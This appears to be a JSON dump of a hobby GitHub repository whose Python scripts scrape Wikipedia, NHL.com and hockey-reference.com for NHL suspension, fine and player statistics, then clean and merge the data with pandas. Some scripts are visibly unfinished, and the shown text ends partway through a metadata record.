"alphanum_fraction": 0.499580979347229,
"avg_line_length": 28.11913299560547,
"blob_id": "bcbe8bca14bc8125d44d0d11b68373dbc42a0a31",
"content_id": "5a55308306a2bbc3f89943a3ae28d380c33ae737",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8353,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 277,
"path": "/Add_Stats.py",
"repo_name": "BStaff1986/DoPSvsML",
"src_encoding": "UTF-8",
"text": "from bs4 import BeautifulSoup\r\nfrom datetime import datetime\r\nimport pandas as pd\r\nimport numpy as np\r\nimport requests\r\nimport pickle\r\nimport json\r\nimport time\r\nimport re\r\n\r\ndops = pd.read_csv('Scrubbed_CSV.csv', encoding='latin1')\r\n\r\ndef parse_id(string):\r\n '''\r\n With search suggestion data returned by NHL.com we can parse\r\n the player's NHL ID number\r\n '''\r\n if len(string) < 10:\r\n return None, None, None\r\n else:\r\n parse = re.compile(r'''\r\n (?:p\\|)\r\n (\\d*)\r\n (?:\\|)\r\n (\\w+)\r\n (?:\\|)\r\n (\\w+)\r\n .*\r\n ''',re.VERBOSE)\r\n parsed = parse.search(string)\r\n try:\r\n id_num = parsed.group(1)\r\n l_name = parsed.group(2)\r\n f_name = parsed.group(3)\r\n except AttributeError:\r\n return \"Error\", \"Error\", \"Error\"\r\n return id_num, f_name, l_name\r\n\r\ndef nhl_scrape():\r\n dops['vic_nhl_id'] = ''\r\n dops['off_nhl_id'] = ''\r\n \r\n for index, row in dops.iterrows():\r\n time.sleep(1)\r\n if type(row['vic_last_name']) is float:\r\n continue\r\n else:\r\n start_trio = row['vic_last_name'][0:3].lower()\r\n r = requests.get('https://suggest.svc.nhl.com/svc/suggest/v1/min_all/'\r\n + start_trio + '/99999')\r\n result = json.loads(r.text)\r\n for ply in result['suggestions']:\r\n id_num, f_name, l_name = parse_id(ply)\r\n if (f_name == row['vic_first_name'] and\r\n l_name == row['vic_last_name']):\r\n dops.set_value(index, 'vic_nhl_id', id_num)\r\n break\r\n \r\n else:\r\n print('NO MATCH')\r\n \r\n if type(row['off_last_name']) is float:\r\n continue\r\n else:\r\n start_trio = row['off_last_name'][0:3].lower()\r\n r = requests.get('https://suggest.svc.nhl.com/svc/suggest/v1/min_all/'\r\n + start_trio + '/99999')\r\n result = json.loads(r.text)\r\n for ply in result['suggestions']:\r\n id_num, f_name, l_name = parse_id(ply)\r\n if (f_name == row['off_first_name'] and\r\n l_name == row['off_last_name']):\r\n print(index, id_num, f_name, l_name)\r\n dops.set_value(index, 'off_nhl_id', id_num)\r\n break\r\n \r\n else:\r\n continue\r\n\r\n'''\r\nThe below is for hockey-reference.com\r\nThe following will capture \r\n'''\r\ndef get_href_id(row, offender=True):\r\n '''\r\n Input DataFrame row\r\n Return identifiers for Hockey-Reference Scraping\r\n '''\r\n if offender == True:\r\n last_name = 'off_last_name'\r\n first_name = 'off_first_name'\r\n elif offender == False:\r\n last_name = 'vic_last_name'\r\n first_name = 'vic_first_name'\r\n \r\n new_year_months = [1,2,3,4,5,6]\r\n \r\n year = row['off_year']\r\n\r\n if row['off_month'] not in new_year_months:\r\n year += 1\r\n \r\n if type(row[last_name]) is float:\r\n return None, None, None\r\n else:\r\n id_ref = (row[last_name][0:5].lower() +\\\r\n row[first_name][0:2].lower()+\\\r\n '01')\r\n init_let = id_ref[0]\r\n \r\n return init_let, id_ref, year\r\n \r\n \r\ndef hockey_ref_scrape(values):\r\n '''\r\n Input hockey reference player ID information\r\n Returns gamelog table for year of incident\r\n '''\r\n init_let = values[0]\r\n id_ref = values[1]\r\n year = values[2]\r\n \r\n if init_let == None or id_ref == None or year == None:\r\n return None, None, None\r\n \r\n url = 'http://www.hockey-reference.com/players/'+\\\r\n init_let + '/'+ id_ref + '/gamelog/'+ str(year)\r\n r = requests.get(url)\r\n soup = BeautifulSoup(r.text, \"lxml\")\r\n \r\n table = soup.find_all('table',{'class':'row_summable'}) \r\n \r\n return table[0] \r\n\r\ndef parse_table(table, off_date):\r\n '''\r\n '''\r\n global new_cols\r\n \r\n rows = table.find_all('tr', {\"id\":re.compile(r'.*')})\r\n stat_dict = create_headers(rows[2])\r\n if new_cols == False:\r\n create_new_df_columns(rows[2])\r\n \r\n for row in rows:\r\n \r\n # Check if the game is before(or on) or after the offending date\r\n game_date = row.find_next('td', {'data-stat':'date_game'}).text\r\n good_date = date_checker(game_date, off_date)\r\n \r\n if good_date:\r\n print(stat_dict)\r\n stat_dict = get_stats(stat_dict, row)\r\n print(stat_dict)\r\n print (''.center(20, '.'))\r\n else:\r\n return stat_dict\r\n \r\n return stat_dict\r\n \r\ndef create_headers(row):\r\n '''\r\n Input row of data.\r\n Parses the names of the categories we'd like to keep\r\n Returns a prepared dictionary\r\n '''\r\n stat_dict = {}\r\n skip = skip_headers()\r\n \r\n for datum in row: \r\n if datum['data-stat'] in skip:\r\n continue\r\n else:\r\n stat_dict.setdefault(datum['data-stat'],0)\r\n \r\n return stat_dict\r\n\r\ndef skip_headers():\r\n '''\r\n Returns a list of the headers to be skipped when creating and updating\r\n the stats dictionary\r\n '''\r\n skip = ['ranker','date_game', 'team_id', 'game_location',\r\n 'opp_id', 'game_result', 'shot_pct', \r\n 'faceoff_percentage_all']\r\n return skip\r\n \r\ndef date_checker(game_date, off_date):\r\n '''\r\n Input date of the game, and the date of suspension offense\r\n Returns True is the game is the same day or before offense\r\n Returns False if the game is after the suspension event\r\n '''\r\n off_date = datetime.strptime(off_date, '%Y-%m-%d')\r\n game_date = datetime.strptime(game_date, '%Y-%m-%d')\r\n \r\n if game_date <= off_date:\r\n return True\r\n else:\r\n return False\r\n \r\ndef get_stats(stat_dict, row):\r\n '''\r\n Input a row and the stat dictionary\r\n Parses the new values and adds them to the dictionary values\r\n Returns the dictionary\r\n '''\r\n skip = skip_headers()\r\n special = ['age', 'time_on_ice']\r\n \r\n for td in row.find_all('td'):\r\n stat = td['data-stat']\r\n if stat not in skip and stat not in special:\r\n stat_dict[stat] += int(td.text)\r\n elif stat == 'time_on_ice':\r\n toi = re.search(r'(\\d{1,2}):?(\\d{1,2})',td.text)\r\n toi_min = int(toi.group(1))\r\n toi_sec = int(toi.group(2))\r\n stat_dict[stat] = ((toi_min * 60) + toi_sec)\r\n elif stat == 'age':\r\n stat_dict[stat] = td.text\r\n \r\n return stat_dict \r\n\r\n# Step 1: Get player ID\r\n# Step 2: Scrape player's gamelog table\r\n# Step 3: Collect season stats prior to offense date\r\n# Step 3b: Deal with Preseason offenses (like Shaw's, dops.loc[1])\r\n# Step 4: Extract stat dictionaries into pandas DataFrame\r\n\r\ndef create_new_df_columns(row):\r\n '''\r\n Inserts new columns into dops dataframe\r\n '''\r\n \r\n global new_cols\r\n \r\n col_prefix = ['off_', 'vic_']\r\n \r\n skip = skip_headers()\r\n for prefix in col_prefix:\r\n for datum in row:\r\n if datum['data-stat'] in skip:\r\n continue\r\n else:\r\n string = prefix + datum['data-stat']\r\n dops[string] = 0\r\n \r\n \r\n new_cols = True\r\n \r\ndef stats_to_dataframe(off_stat, vic_stat, index):\r\n '''\r\n Input stats\r\n Add stats into dataframe\r\n '''\r\n off_keys = list(map(lambda stat: 'off_' + stat, off_stat.keys()))\r\n off_vals = [v for v in off_stats.values()]\r\n for x in zip(off_keys, off_vals):\r\n \r\n \r\n \r\n \r\nnew_cols = False\r\nfor index, row in dops.loc[0:1].iterrows():\r\n print(index)\r\n print(row['off_date'])\r\n print(row['off_last_name']) \r\n \r\n off_table = hockey_ref_scrape(get_href_id(row, offender=True))\r\n \r\n if table:\r\n off_stats = parse_table(off_table, row['off_date'])\r\n else: \r\n off_stats = None\r\n \r\n #table = hockey_ref_scrape(get_href_id(row, offender=True))\r\n\r\n \r\n\r\n"
},
{
"alpha_fraction": 0.5356037020683289,
"alphanum_fraction": 0.5406346917152405,
"avg_line_length": 32,
"blob_id": "4e46c86c2d39df2e0dcd0766bc7cbf34e4302e5b",
"content_id": "87e5368e372838ceaf96f8ec3c0e4e23299d2601",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2584,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 76,
"path": "/Injury Data Add (Later).py",
"repo_name": "BStaff1986/DoPSvsML",
"src_encoding": "UTF-8",
"text": "'''\r\nInjury Data from http://nhlinjuryviz.blogspot.ca/p/index-page.html\r\n'''\r\n\r\nimport pandas as pd\r\nimport re\r\n\r\n# TODO: Get victim's team\r\n\r\ninj = pd.read_csv('NHL_Injuries.csv')\r\n\r\n# TODO: Change this CSV to the new stats one\r\ndops = pd.read_csv('Scrubbed_CSV.csv', encoding='latin1')\r\n\r\ndef reformat_season_year(row):\r\n '''\r\n Uses regex to parse the starting year of the season\r\n '''\r\n \r\n year = re.compile(r'''\r\n ([2][0]\\d{2})\r\n \r\n ''', re.VERBOSE)\r\n return int(re.search(year, row).group(1))\r\n\r\ninj['start_year'] = inj['Season'].apply(reformat_season_year)\r\n\r\n# Eliminate the injuries that are not caused by things players get \r\n# suspended for.\r\nelim_injs = ['Pneumonia', 'Thyroid', 'Migraine', 'Blood clots',\r\n 'Sinus', 'Stomach', 'Bronchitis', 'Vertigo', 'Heart',\r\n 'Dizziness', 'Appendectomy', 'Fatigue', 'Illness', 'Flu']\r\ninj = inj[-inj['Injury Type'].isin(elim_injs)]\r\n\r\nvictim_names = dops['victim'].unique()\r\n#victim_names = victim_names[victim_names != 'No Player Victim']\r\n\r\nvic_set = set(dops['vic_last_name'])\r\ninj_set = set(inj['Player'])\r\n\r\nintersect = inj_set.intersection(vic_set)\r\n#intersect = set(['Zucker'])\r\n\r\n# See how many injuries and suspension year match up\r\ninj_connect = pd.DataFrame(columns=['victim', 'date', 'games_missed',\r\n 'inj_type', 'susp_act'])\r\n\r\n# TODO: Multiple injuries in a year should appear as separate lines\r\n# TODO: Maybe get victim's team first\r\n# USE df[(df['x'] == 'a') & (df['y'] == 'b')]!!!\r\nfor player in intersect:\r\n dops_df = dops[dops['vic_last_name'] == player]\r\n inj_df = inj[inj['Player'] == player]\r\n \r\n new_year_months = [1,2,3,4,5,6,7]\r\n for index, row in dops_df.iterrows():\r\n off_year = row['off_year']\r\n if row['off_month'] in new_year_months:\r\n off_year -= 1 \r\n \r\n if off_year in inj_df['start_year'].values:\r\n inj_year = inj_df[inj_df['start_year'] == off_year]\r\n #print(inj_year)\r\n victim = row['vic_last_name']\r\n date = row['off_date']\r\n print(date)\r\n g_miss = inj_year['Games Missed']\r\n print(g_miss)\r\n inj_type = inj_year['Injury Type']\r\n susp_act = row['offense_cat']\r\n \r\n inj_connect.loc[len(inj_susp_connect)] = [victim, date,\r\n g_miss, inj_type, susp_act]\r\n break \r\n \r\nprint(len(inj_susp_connect))\r\n"
},
{
"alpha_fraction": 0.5173559784889221,
"alphanum_fraction": 0.5256646871566772,
"avg_line_length": 33.6315803527832,
"blob_id": "e9696ddcdd5d22414ae016c06225959afa0405ca",
"content_id": "bc2d5e4e7e6a484648d6a9001b2908801bd5956c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10832,
"license_type": "no_license",
"max_line_length": 106,
"num_lines": 304,
"path": "/CSV_cleaner.py",
"repo_name": "BStaff1986/DoPSvsML",
"src_encoding": "UTF-8",
"text": "import pandas as pd\r\nfrom math import isnan\r\nimport re\r\n\r\ndops = pd.read_csv('NHL_Suspensions.csv', encoding='latin1')\r\n\r\n'''\r\nWarning: Regex for victim's name currently will not work with names like\r\nD'Amigo except for when parsing that last name in the form where the first\r\nname comes first. Will not do so the other way around and not for offenders.\r\n'''\r\n\r\n# Column 1 = Date of Offense\r\n# Column 2 = Offender Name\r\n# Column 3 = Offender's Team\r\n# Column 4 = Offense\r\n# Column 5 = Day of DoPs decision\r\n# Column 6 = Suspension Amount\r\n# Column 7 = Forfeited Salary\r\n# Column 8 = Fine\r\n\r\n# TODO: Get Contract Info at https://www.capfriendly.com/\r\n\r\n\r\ndef re_parse_offense(row):\r\n '''\r\n This function goes through all the offense descriptions and, based on\r\n keywords it's able to parse using Regex, assigns a short description\r\n to be coded in later exploration\r\n '''\r\n re_exps = {r'.*abuse.*official' : 'Abuse of Official',\r\n r'Attempt.*' : 'Attempt to Injure',\r\n r'Automatic.*' : 'Automatic Suspension',\r\n r'Blindsid.*' : 'Blindsiding',\r\n r'Board.*' : 'Boarding',\r\n r'[Bb]utt-?end.*' : 'Butt-Ending',\r\n r'[Cc]harg.*' : 'Charging',\r\n r'Clip.*' : 'Clipping',\r\n r'([Cc]omment.*|[Cc]omplaint.*|[Gg]esture.*|[Ss]lur)' : 'Comments/Gestures',\r\n r'Cross.check.*' : 'Cross-checking',\r\n r'Diving.*' : 'Diving',\r\n r'Elbow.*': 'Elbowing',\r\n r'[Hh]ead-?butt.*' : 'Head-Butting',\r\n r'High.stick.*' : 'High-Stick',\r\n r'(Hit.*|Check.*) from behind':'Hitting from Behind',\r\n r'Illegal( check| hit)' : 'Illegal Check',\r\n r'(Inappropriate.*|conduct)' : 'Inappropriate Conduct',\r\n r'([Ii]nstigat.*|[Aa]ggress.*)' : 'Instigator', \r\n r'Interfer.*' : 'Interference',\r\n r'Knee-on-knee.*' : 'Knee-on-knee',\r\n r'([Kk]ick.*|Kneeing)' : 'Kicking or Kneeing',\r\n r'([Ll]ate|[Ll]ow)?.*([Hh]it.|[Cc]heck)(to the head)?' : 'Illegal hit',# Late, low, to head\r\n r'[Ll]eaving.*bench' : 'Leaving Bench',\r\n r'[Pp]unch.*' : 'Punching', \r\n r'Roughing.*' : 'Roughing',\r\n r'Slash.*' : 'Slashing', \r\n r'[Ss]lew.*' : 'Slew-footing',\r\n r'Spear.*': 'Spearing',\r\n r'[Tt]rip.*' : 'Tripping',\r\n r'.*[Vv]iolating' : 'Drugs',\r\n }\r\n for k,v in re_exps.items():\r\n if re.search(k, row):\r\n return v\r\n else:\r\n continue\r\n return 'NO PARSE' # Labels uncoded entries\r\n \r\n\r\ndef re_parse_victim(row):\r\n '''\r\n This function parses player names out of the description of the offenses\r\n '''\r\n \r\n errors = ['Substances Program','Health Program',\r\n 'Star Game','Montreal Canadiens',\r\n 'Vancouver Canucks','Maple Leafs','Red Wings',]\r\n \r\n vic = re.compile(r'''\r\n (?:[A-Z]\\w+ing)?\r\n .*\r\n (([A-Z]\\w+\\s[A-Z]\\w+| # Regular names\r\n [A-Z][.]\\s?[A-Z][.]\\s?\\s[A-Z]\\w+| # P. K.s and T.J.s\r\n [A-Z]\\w+\\s[A-Z]'[A-Z]\\w+ # D'Amigos\r\n ))\r\n ''', re.VERBOSE)\r\n try:\r\n if vic.search(row).group(1) in errors:\r\n return \"No Player Victim\"\r\n else:\r\n return vic.search(row).group(1)\r\n except AttributeError: \r\n return \"No Player Victim\"\r\n \r\n \r\ndef re_parse_total_games(row):\r\n '''\r\n This finds the total number of games a player was suspended for.\r\n The regex assumes that the first number is the number of games suspended\r\n which is true for 99% of entries*\r\n \r\n (*Tortorella was suspended 15 days, which amounted to 6 games)\r\n '''\r\n \r\n games = re.compile(r'''\r\n (\\d+)\r\n (?:\\s.*)?\r\n ''', re.VERBOSE)\r\n return int(re.search(games, row).group(1))\r\n\r\ndef re_parse_playoff_games(row):\r\n '''\r\n Uses regex to find the number of playoff games in the suspension\r\n '''\r\n \r\n post_games = re.compile(r'''\r\n .*?\r\n (\\d+)\r\n (?:\\s[A-Z]{,3})?\r\n (?:\\s\\d{4})?\r\n \\s\r\n post-season.* \r\n ''', re.VERBOSE)\r\n try:\r\n return int(re.search(post_games, row).group(1))\r\n except AttributeError:\r\n return 0\r\n \r\ndef re_parse_preseason_games(row):\r\n '''\r\n Uses regex to get the number of preseason games in the suspension\r\n '''\r\n \r\n pre_games = re.compile(r'''\r\n .*?\r\n (\\d+)\r\n (?:\\s[A-Z]{,3})?\r\n (?:\\s\\d{4})?\r\n \\s\r\n pre-season.* \r\n ''', re.VERBOSE)\r\n try:\r\n return int(re.search(pre_games, row).group(1))\r\n except AttributeError:\r\n return 0\r\n\r\ndef money_to_float(row):\r\n replacements = {\"$\":'', \",\":\"\"}\r\n if type(row) is str:\r\n try:\r\n return float(''.join([replacements.get(c,c) for c in row]))\r\n except ValueError:\r\n try:\r\n re_expr = re.compile(r'''\r\n [$]\r\n (\\d+,\\d+.\\d+)\r\n .*? \r\n ''', re.VERBOSE)\r\n money = re.search(re_expr, row).group(1)\r\n return float(''.join([replacements.get(c,c) for c in money]))\r\n except AttributeError:\r\n return \"ERROR\"\r\n else:\r\n return 0\r\n \r\ndef get_year(row):\r\n '''\r\n This function pulls the year out of datetime object and returns\r\n just the year\r\n '''\r\n try:\r\n return int(row.year)\r\n except ValueError:\r\n return 0\r\n\r\ndef get_month(row):\r\n '''\r\n This function pulls the year out of datetime object and returns\r\n just the month\r\n '''\r\n try:\r\n return int(row.month)\r\n except ValueError:\r\n return 0\r\n\r\ndef get_day(row):\r\n '''\r\n This function pulls the year out of datetime object and returns\r\n just the day\r\n '''\r\n try:\r\n return int(row.day)\r\n except ValueError:\r\n return 0\r\n \r\ndef get_off_lastname(name):\r\n '''Parse the victim's last name'''\r\n non_player = ['No Player Victim', 'Team', 'Organization']\r\n if name in non_player:\r\n return None\r\n \r\n if ',' in name:\r\n reg_exp = re.compile(r'(\\w+)[,]?\\s\\w+')\r\n return reg_exp.findall(name).pop()\r\n \r\n else:\r\n reg_exp = re.compile(r'.*\\s(\\w+)')\r\n return reg_exp.findall(name).pop()\r\n\r\ndef get_off_firstname(name):\r\n '''Parse the victim's last name'''\r\n non_player = ['No Player Victim', 'Team', 'Organization']\r\n if name in non_player:\r\n return None\r\n \r\n if ',' in name:\r\n reg_exp = re.compile(r'\\w+[,]?\\s(\\w+)')\r\n return reg_exp.findall(name).pop()\r\n \r\n else:\r\n reg_exp = re.compile(r'(.*)\\s\\w+')\r\n return reg_exp.findall(name).pop()\r\n\r\ndef get_vic_lastname(name):\r\n '''Parse the victim's last name'''\r\n non_player = ['No Player Victim', 'Team', 'Organization']\r\n if name in non_player:\r\n return None\r\n \r\n if ',' in name:\r\n reg_exp = re.compile(r'(\\w+)[,]?\\s\\w+')\r\n return reg_exp.findall(name).pop()\r\n \r\n else:\r\n reg_exp = re.compile(r'.*\\s([A-Z].\\w+|\\w+)')\r\n return reg_exp.findall(name).pop()\r\n\r\ndef get_vic_firstname(name):\r\n non_player = ['No Player Victim', 'Team', 'Organization']\r\n if name in non_player:\r\n return None\r\n \r\n if ',' in name:\r\n reg_exp = re.compile(r'\\w+[,]?\\s(\\w+)')\r\n return reg_exp.findall(name).pop()\r\n \r\n else:\r\n reg_exp = re.compile(r'(.*)\\s\\w+')\r\n return reg_exp.findall(name).pop()\r\n\r\n# Apply functions to create new columns\r\ndops['offense_cat'] = dops['offense'].apply(re_parse_offense)\r\ndops['victim'] = dops['offense'].apply(re_parse_victim)\r\ndops['total_susp_games'] = dops['susp'].apply(re_parse_total_games)\r\ndops['playoff_susp_games'] = dops['susp'].apply(re_parse_playoff_games)\r\ndops['preseason_susp_games'] = dops['susp'].apply(re_parse_preseason_games)\r\ndops['reg_susp_games'] = (dops['total_susp_games'] - dops['playoff_susp_games']\r\n - dops['preseason_susp_games'])\r\ndops['forfeit_sal'] = dops['forfeit_sal'].apply(money_to_float)\r\n\r\n# Turn dates into datetime, extract year, month, date\r\ndops['off_date'] = pd.to_datetime(dops['off_date'], \r\n infer_datetime_format=True)\r\ndops['off_year'] = dops['off_date'].apply(get_year)\r\ndops['off_month'] = dops['off_date'].apply(get_month)\r\ndops['off_day'] = dops['off_date'].apply(get_day)\r\n\r\n# Same as above but for the dops date\r\ndops['dops_date'] = pd.to_datetime(dops['dops_date'], \r\n infer_datetime_format=True)\r\ndops['dops_year'] = dops['dops_date'].apply(get_year)\r\ndops['dops_month'] = dops['dops_date'].apply(get_month)\r\ndops['dops_day'] = dops['dops_date'].apply(get_day)\r\n\r\ndops['off_last_name'] = dops['offender'].apply(get_off_lastname)\r\ndops['off_first_name'] = dops['offender'].apply(get_off_firstname)\r\ndops['vic_last_name'] = dops['victim'].apply(get_vic_lastname)\r\ndops['vic_first_name'] = dops['victim'].apply(get_vic_firstname)\r\n\r\n# Manually set some unique cases\r\ndops.set_value(21, 'offense_cat', 'Spearing')\r\ndops.set_value(139,'offense_cat', 'Instigating')\r\ndops.set_value(147, 'offense_cat', 'Inappropriate Conduct')\r\ndops.set_value(198, 'offense_cat', 'Inappropriate Conduct')\r\ndops.set_value(205, 'offense_cat', 'Inappropriate Conduct')\r\ndops.set_value(248, 'offense_cat', 'Inappropriate Conduct')\r\ndops.set_value(338, 'offense_cat', 'Inappropriate Conduct')\r\ndops.set_value(339, 'offense_cat', 'Inappropriate Conduct')\r\ndops.set_value(352, 'offense_cat', 'Inappropriate Conduct')\r\ndops.set_value(381, 'offense_cat', 'Illegal Hit')\r\ndops.set_value(388, 'offense_cat', 'Inappropriate Conduct')\r\ndops.set_value(390, 'offense_cat', 'Inappropriate Conduct')\r\ndops.set_value(394, 'offense_cat', 'Inappropriate Conduct')\r\ndops.set_value(401, 'offense_cat', 'Inappropriate Conduct')\r\ndops.set_value(431, 'offense_cat', 'Inappropriate Conduct')\r\ndops.set_value(182, 'total_susp_games', 6)\r\ndops.set_value(241, 'total_susp_games', 6)\r\ndops.set_value(381, 'total_susp_games', 4)\r\ndops.set_value(94, 'forfeit_sal', 0)\r\n\r\ndops.drop(dops.index[1], inplace=True) # Suspension included in two data sets\r\n\r\n\r\ndops.to_csv('Scrubbed_CSV.csv')\r\n"
},
{
"alpha_fraction": 0.49086934328079224,
"alphanum_fraction": 0.5066872239112854,
"avg_line_length": 31.670995712280273,
"blob_id": "570d2e5c5b557990464ecc3fb24143b03463fd86",
"content_id": "ae5fd4046c2cccd26a6427362c37e0d66e4418fa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7778,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 231,
"path": "/NHL_Wiki_Scraper.py",
"repo_name": "BStaff1986/DoPSvsML",
"src_encoding": "UTF-8",
"text": "import requests\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom bs4 import BeautifulSoup\r\n\r\nurl = 'https://en.wikipedia.org/wiki/'\r\n\r\n# Collect all the URL endings for the pages we want\r\npages = ['{}–{}_NHL_suspensions_and_fines'.format(str(n-1), \r\n str(n)[-2:]) for n in range(2017, 2009, -1)]\r\n\r\n# Create our DataFrame and preload the columns we will use\r\ndops_df = pd.DataFrame(columns=('off_date', 'offender', 'off_team', 'offense', \r\n 'dops_date', 'susp', 'forfeit_sal', 'fine'))\r\n\r\n\r\n\r\ndef suspension_table(table):\r\n '''\r\n This function goes through the Wikitables that hold data about player\r\n suspensions. \r\n '''\r\n rows = table.find_all('tr')\r\n for row in rows[1:-1]:\r\n td = row.find_all('td')\r\n \r\n # NOTE: Some tables had data in a span class, others just text\r\n # which is why there are some try and except clauses.\r\n \r\n # td[0] holds Offense Date\r\n try:\r\n off_date = td[0].find('span',\r\n {'style':'white-space:nowrap'}).text\r\n except AttributeError:\r\n off_date = td[0].text\r\n #td[1] holds the Offender's Name\r\n try:\r\n offender = td[1].find('span').text\r\n except:\r\n offender = td[1].text\r\n # td[2] holds Offender's Team \r\n off_team = td[2].text\r\n # td[3] holds a description of the Offense. \r\n offense = td[3].text\r\n # td[4] holds the day the suspension was given out\r\n try:\r\n dops_date = td[4].find('span',\r\n {'style':'white-space:nowrap'}).text\r\n except AttributeError:\r\n dops_date = td[4].text\r\n # td[5] holds the length of the suspension\r\n susp = td[5].text\r\n # td[6] holds the amount of salary forfeited from the suspension \r\n try:\r\n forfeit_sal = td[6].text\r\n except IndexError:\r\n forfeit_sal = 'N/A'\r\n # No fines so value is 0\r\n fine = 0\r\n\r\n # Store all the scraped values in the DataFrame \r\n dops_df.loc[len(dops_df)] = [off_date, offender, off_team, \r\n offense, dops_date, susp, forfeit_sal, fine]\r\n\r\n \r\n\r\ndef fines_table(table):\r\n '''\r\n This function goes through the tables that contain the fine data\r\n found in Wikipedia tables. \r\n '''\r\n rows = table.find_all('tr')\r\n \r\n # NOTE: Some tables used span classes while others used simple text\r\n # which is why there are lots of try and except clauses\r\n \r\n for row in rows[1:-1]:\r\n td = row.find_all('td')\r\n # Get the date of offense\r\n try:\r\n off_date = td[0].find('span',\r\n {'style':'white-space:nowrap'}).text\r\n except AttributeError:\r\n off_date = td[0].text\r\n # Get the offender's name \r\n try:\r\n offender = td[1].find('span').text\r\n except AttributeError:\r\n offender = td[1].text\r\n # Get offending team\r\n off_team = td[2].text\r\n # Get the offense\r\n offense = td[3].text\r\n # Get the day the DoPS made a decision\r\n try:\r\n dops_date = td[4].find('span',{'style':'white-space:nowrap'}).text\r\n except AttributeError:\r\n dops_date = td[4].text\r\n susp = 0\r\n forfeit_sal = 0\r\n # Get the fine amount\r\n fine = td[5].text\r\n \r\n dops_df.loc[len(dops_df)] = [off_date, offender, off_team, \r\n offense, dops_date, susp, forfeit_sal, fine]\r\n \r\ndef susp_table_oldstyle(table):\r\n '''\r\n Older Wikipedia tables did not have a column for the day the suspensions\r\n were applied and this shifted the data around so a new function was made.\r\n '''\r\n \r\n rows = table.find_all('tr')\r\n for row in rows[1:]:\r\n td = row.find_all('td')\r\n # Get the date of offense\r\n try:\r\n off_date = td[0].find('span',\r\n {'style':'white-space:nowrap'}).text\r\n except AttributeError:\r\n off_date = td[0].text\r\n # Get the offender's name \r\n try:\r\n offender = td[1].find('span').text\r\n except AttributeError:\r\n offender = td[1].text\r\n # Get offending team\r\n off_team = td[2].text\r\n # Get the offense\r\n offense = td[3].text\r\n # Get the day the DoPS made a decision\r\n dops_date = np.nan\r\n susp = td[4].text\r\n forfeit_sal = np.nan\r\n # Get the fine amount\r\n fine = np.nan\r\n \r\n dops_df.loc[len(dops_df)] = [off_date, offender, off_team, \r\n offense, dops_date, susp, forfeit_sal, fine]\r\n \r\n \r\ndef fines_table_oldstyle(table):\r\n '''\r\n Older Wikipedia tables did not contain the date which the fines were \r\n applied and this shifted the data around. As such, a new function was\r\n created\r\n '''\r\n \r\n rows = table.find_all('tr')\r\n for row in rows[1:]:\r\n td = row.find_all('td')\r\n # Get the date of offense\r\n try:\r\n off_date = td[0].find('span',\r\n {'style':'white-space:nowrap'}).text\r\n except AttributeError:\r\n off_date = td[0].text\r\n # Get the offender's name \r\n try:\r\n offender = td[1].find('span').text\r\n except AttributeError:\r\n offender = td[1].text\r\n # Get offending team\r\n off_team = td[2].text\r\n # Get the offense\r\n offense = td[3].text\r\n # Get the day the DoPS made a decision\r\n dops_date = np.nan\r\n susp = 0\r\n forfeit_sal = np.nan\r\n # Get the fine amount\r\n fine = td[4].text\r\n \r\n dops_df.loc[len(dops_df)] = [off_date, offender, off_team, \r\n offense, dops_date, susp, forfeit_sal, fine]\r\n \r\n\r\ndef detect_page_table_type(page):\r\n '''\r\n Reads which year the Wiki pages covers and returns the appropriate \r\n number of table headers to read in. \r\n '''\r\n header_count ={\r\n '2016':[10,8],\r\n '2015':[10,8],\r\n '2014':[10,8],\r\n '2013':[11,9],\r\n '2012':[6,6],\r\n '2011':[6,6],\r\n '2010':[5,5],\r\n '2009':[5,5],\r\n }\r\n \r\n year = page[0:4]\r\n \r\n return header_count[year][0], header_count[year][1]\r\n\r\n# Scrape each Wiki page for it's tables\r\nfor page in pages:\r\n print(page) \r\n r = requests.get(url + page)\r\n bs = BeautifulSoup(r.text, features='lxml-xml')\r\n tables = bs.find_all('table',{'class':'wikitable sortable'})\r\n \r\n # Find the style of table by year\r\n susp_len, fine_len = detect_page_table_type(page)\r\n \r\n # Extract the data according to table type\r\n if susp_len > 6:\r\n for table in tables:\r\n headers = table.find_all('th')\r\n if len(headers) == susp_len:\r\n suspension_table(table)\r\n elif len(headers) == fine_len:\r\n fines_table(table)\r\n else:\r\n continue\r\n elif susp_len == 6:\r\n for table in tables:\r\n # Fine and suspensions are of equal length\r\n # Searching for length will determine type\r\n if '<th>Length</th>' in str(table.find_all('th')):\r\n suspension_table(table)\r\n else:\r\n fines_table(table)\r\n else:\r\n susp_table_oldstyle(tables[0])\r\n fines_table_oldstyle(tables[1])\r\n print(len(dops_df))\r\n \r\ndops_df.to_csv('NHL_Suspensions.csv')"
}
] | 4 |
Haury-Tech/Melanated-Mamas
|
https://github.com/Haury-Tech/Melanated-Mamas
|
3baddf4ae811600f6a0d26c052ce57995fcd3f42
|
1a0d12f95ebe59ff24572d3c98e524cce89c83b0
|
c3558f7f78474ea1ba30410554da6f13a8484008
|
refs/heads/master
| 2023-04-18T04:01:36.111564 | 2021-04-27T00:06:30 | 2021-04-27T00:06:30 | 358,256,763 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7777777910232544,
"alphanum_fraction": 0.7777777910232544,
"avg_line_length": 17,
"blob_id": "6e8a3b30c01206be580cf3d0cb1788b59efc7837",
"content_id": "bda0f31e4247c076e8ed5857a828caecf877013d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 18,
"license_type": "no_license",
"max_line_length": 17,
"num_lines": 1,
"path": "/README.md",
"repo_name": "Haury-Tech/Melanated-Mamas",
"src_encoding": "UTF-8",
"text": "# Melanated-Mamas\n"
},
{
"alpha_fraction": 0.7290167808532715,
"alphanum_fraction": 0.7290167808532715,
"avg_line_length": 28.714284896850586,
"blob_id": "7c3200bad2457d812623ad119ee2058f12610764",
"content_id": "812ae00b4d4c8c9903cf01fe82591d1dde79610a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 417,
"license_type": "no_license",
"max_line_length": 70,
